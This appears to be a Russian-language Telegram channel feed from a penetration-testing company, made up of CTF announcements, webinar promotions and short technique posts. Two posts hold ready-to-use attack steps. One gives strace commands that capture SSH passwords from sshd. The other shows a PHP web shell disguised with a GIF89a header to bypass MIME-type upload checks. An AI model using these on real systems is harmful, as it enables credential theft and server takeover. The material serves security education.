RESOLUTE ATTACK
6.45K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
Призрачный Ethernet & Обход NAC – Практический обзор

Какой бы ни была причина, сокрытие вашей личности в сети на уровне Ethernet дает значительные преимущества при внутренней оценке безопасности.
Одним из практических способов добиться этого является использование метода, который мы любим называть «Ethernet Ghosting», когда законное устройство в сети используется в качестве маски для маскировки связи с устройством злоумышленника.

Читать

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
158👍7🔥7
💻 CTF TIME - Платформа на который публикуются ближайшие CTF ивенты, в которых можно принять участие. Также есть система рейтинга, на которой можно посмотреть лидеров по CTF соревнованиям в мире. Также есть история соревнований. Кибер спорт должен быть таким?

Теперь ветка в нашем чате кибер ивенты будет активно заполняться.

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
15🔥83👍3
⚡️RESOLUTE ATTACK и Anti-Malware.ru теперь официально имеют партнёрские отношения🔥
Предлагаем вам посетить ближайший их ивент

AM Live: Аппаратное обеспечение для российского ИБ
📅14 декабря, СР, 11:00

В прямом эфире обсудим:
🔸Сможет ли рынок информационной безопасности адаптироваться к новой реальности?
🔸Получится ли избежать тотального дефицита оборудования?
🔸 Россия не производит современные микропроцессоры, чипы памяти, СХД и много чего еще. Есть ли шансы это исправить?
🔸Спрос и предложение на аппаратное обеспечение для ИБ

Модератор:
🔸Руслан Иванов, Директор офиса развития инфраструктуры стратегических корпоративных заказчиков «Ростелеком-Солар»

Спикеры:
🔸Павел Коростелев, Руководитель отдела продвижения продуктов «Код Безопасности»
🔸Карина Абагян, Директор по стратегическому развитию
АО "Микрон"
🔸Сергей Плотко, Директор по аналитике и интеграции АО "НПП "Цифровые решения"
🔸Константин Закатов, Руководитель Департамента информационной безопасности ООО «ПК АКВАРИУС»

Принять участие

#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥8👍2
This media is not supported in your browser
VIEW IN TELEGRAM
🤨Команда девелоперов
RESOLUTE ATTACK

Строчит курс PRTT 😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣356👍4
Forwarded from SecuriXy.kz
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd

pgrep -l sshd

2. Отслеживаем системные вызовы

strace -f -p <ssh_PID> -e trace=write -o capture

Ну или одной строкой

strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture


#ssh #sniff #password
18🔥94👍4
😈Scraping директорий на Python

Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.

Читать

#Python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥176👍5
До 9к добъём?
👍34🔥12
🗣Обход загрузки файлов с использованием MIME-типа

Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.

Для этого нам нужно добавить только одну строку в начале нашего скрипта: GIF89a;

GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.

GIF89a;
<?php
system('whoami'); # shellcode goes here
?>

RESOLUTE ATTACK

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6😍3🤣3
⚡️ Пентест 1С-БИТРИКС
Завтра в 20:00 (мск)

В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".

Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости

➡️ Спикер: Сергей Кузьмин ( Firewall )
Представитель канала - https://t.me/netrunnerz

Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.

Доклад будет проходить на нашем ютуб канале

➡️ https://www.youtube.com/watch?v=c7vZUII29xs

#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥1063
🔄В начале декабря Google релизнули свои машинки формата CTF. Проект получил название H4CK1NG. Стильный интерфейс, нетривиальные решения, все это - бесплатно. Делитесь в чате своими успехами в прохождении задачек, я тоже пойду порешаю ^_^
h4ck1ng.google

E1TEX|RESOLUTE ATTACK

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👨‍💻9👍642
⚡️ Пентест 1С-БИТРИКС
УЖЕ ЧЕРЕЗ ОДИН ЧАС

В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".

Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости

➡️ Спикер: Сергей Кузьмин ( Firewall )
Представитель канала - https://t.me/netrunnerz

Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.

Доклад будет проходить на нашем ютуб канале

➡️ https://www.youtube.com/watch?v=c7vZUII29xs

#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥157👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26🤩6😍5👍3